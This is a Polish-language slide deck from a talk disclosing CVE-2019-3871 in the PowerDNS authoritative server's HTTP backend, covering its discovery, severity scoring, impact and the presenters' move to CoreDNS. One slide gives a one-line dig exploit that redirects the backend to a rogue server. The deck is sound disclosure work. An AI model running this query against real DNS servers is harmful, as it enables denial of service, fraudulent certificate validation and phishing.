--- title: CVE-2019-3871 tags: Talk description: View the slide with "Slide Mode". --- <style> .reveal { background-color: #fff; } .reveal, .reveal h1,.reveal h2,.reveal h3,.reveal h4 { color: #333; } </style> # CVE-2019-3871 Gregory Brzeski, Adam Dobrawy --- # Kim jesteśmy? - HyperOne - wydajne i stabilne usługi publicznej chmury obliczeniowej - Zespół nastawiony na inżynieryjne podejście --- # O czym opowiemy * DNS * CVE-2019-3871 * Sposób odkrycia * Potencjalne skutki * Przebieg łatania * Mitygacja --- # DNS - Kto zna? - Kto korzysta? - Kto konfigurował własny serwer? --- # DNS - Co w pakiecie odpowiedzi serwera DNS świadczy o tym, że odpowiedź jest autorytatywna? --- # Autorytatywny serwer DNS <!-- [](https://i.imgur.com/0tyJ1Qf.png) --> <img src="https://i.imgur.com/SAwPTzZ.png" width="300px"> --- # CVE-2019-3871 * Base Score CVE NVD: 8.8 (high) * https://nvd.nist.gov/vuln/detail/CVE-2019-3871 * https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H * Jedynie High, choć może Critical, a zaczęto od Low --- # CVE score <img src="https://i.imgur.com/hS9VKmc.png" width="100%"> --- # CVE score <img src="https://i.imgur.com/rVOcBvC.png" width="100%"> --- # Sposób odkrycia https://www.sciencealert.com/these-eighteen-accidental-scientific-discoveries-changed-the-world --- # Exploit ```bash $ dig anything@rouge-api-server @target-server ``` Fits in the Twitter message! --- # Expected flow <img src="https://i.imgur.com/C8SSvaq.png" width="70%"> --- # Affected flow <img src="https://i.imgur.com/VCg7OdT.png" width="70%"> --- # Affected flow <img src="https://i.imgur.com/31PPvNP.png" width="70%"> --- # Wpływ * wszystkie wersje Autorytatywnego serwera PowerDNS z backendem HTTP * nie wymaga specjalnych uprawnień * zwykle uodstępniana jako ogólnodostępna usługa * DOS <!-- - zmodyfikowany serwer danych nie musi udzielać odpowiedzi, a wówczas klient nie otrzymuje odpowiedzi --> * reflected DDOS * walidacja dla uzyskania certyfikatów SSL <!-- zmodyfikowany serwer może przejść ją z łatwością --> * phishing - zniweczenie HTTPS * utrata haseł itp. --- <!-- # Łatanie --> <!-- "Based on our current understanding of the severity, the bounty should be around $350." --> <!-- PowerDNS rewarded adobrawy with a $900 bounty. PowerDNS rewarded fredericosilva with a $900 bounty. --> <!-- # Mitigation --- --> # Co dalej? * Od tego czasu wycofujemy PowerDNS * Zastępujemy przez własny moduł CoreDNS * Serwer DNS napisany w Go * Istnieje plan otwarcia tego kodu na GitHub